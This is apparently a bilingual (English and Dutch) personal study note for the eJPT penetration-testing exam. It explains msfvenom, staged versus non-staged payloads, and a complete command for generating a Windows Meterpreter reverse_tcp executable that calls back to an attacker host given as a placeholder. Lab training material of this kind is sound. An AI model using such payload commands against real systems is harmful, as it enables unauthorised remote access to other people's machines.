Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/3. The Metasploit framework (MSF)/Information Gathering & Enumeration.md

 - msfvenom is a combination of two utilities: msfpayload and msfencode
 - msfvenom is used to generate a malicious meterpreter payload that can be transferred to a client target system.
 Once executed it will connect back to our payload handler and provide us with remote access to target system.

+msfvenom kan zowel staged als non-staged payload genereren:
+Een staged payload wordt in meerdere fasen afgeleverd op het doelsysteem, bestaande uit een initiële 'stager' (**Initiële Stager**: Dit is het eerste deel van een staged payload.
+Het is meestal een kleine, onopvallende stukje code of script dat wordt gebruikt om een voet aan de grond te krijgen op het doelsysteem.) die een secundaire payload (**Secundaire Payload**: Dit is het tweede deel van een staged payload.
+Het is de eigenlijke kwaadaardige code die de aanvaller wil uitvoeren op het doelsysteem.) downloadt en uitvoert, wat meer controle en flexibiliteit biedt aan de aanvaller, terwijl een non-staged payload als één zelfstandige code wordt afgeleverd voor directe uitvoering, wat eenvoudiger is maar mogelijk gemakkelijker detecteerbaar door beveiligingssoftware vanwege zijn grotere voetafdruk.
+Het idee achter staged payloads is om de initiële aanvalsketen te scheiden in twee delen: een initiële stager die moeilijker te detecteren is en een secundaire payload die de feitelijke aanvalsdoelen bereikt.
+ ![[Pasted image 20230824154209.png]] in de afbeelding kan je zien welke staged is en welke niet.
+De \/ is een indicatie dat het staged is en de _ _ geeft aan dat het niet-staged is.

 How to generate payload with msfvenom?

+1) start msfvenom
+	- `msfvenom`
+	-  `msfvenom --list payloads` will provide you a list of payloads you can generate with msfvenom meterpreter payload will also allow you to specify the target architecture of the target operating system : Windows x64 or x32 payload.
+Je kan niet een x64 payload running op een 32 bit system dus het is belangrijk dat je hier goed naar kijkt

+ 2) generate payload with msfvenom
+	 - ` msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=kali_vm_ip LPORT=port_to_connect_back_to -f exe > /home/kali/Desktop/Windows_payload/payloadx86.exe`
+		 - - `-a x86`: This option specifies the architecture for the payload, which is set to "x86" in this case. x86 refers to a common 32-bit Intel processor architecture.
+		- `-p windows/meterpreter/reverse_tcp`: This option specifies the type of payload to generate.
+In this case, it's generating a Meterpreter payload
+		- `LHOST=kali_vm_ip`: This is the IP address where the compromised Windows machine will try to connect back to.
+		- `LPORT=port_to_connect_back_to`: port number where the compromised Windows machine will attempt to connect back to your Kali Linux machine.
+		- `-f exe`: This option specifies the format of the payload.
+In this case, it's specifying that the payload should be in the form of a Windows executable (.exe) file.
+		- `> /home/kali/Desktop/Windows_payload/payloadx86.exe`: This part of the command redirects the output of the payload generation to a file named `payloadx86.exe` located in the specified directory on your Kali Linux machine.
+This file will contain the generated payload.
+IMPORTANT TO SPECIFY THE EXETENTION

+	-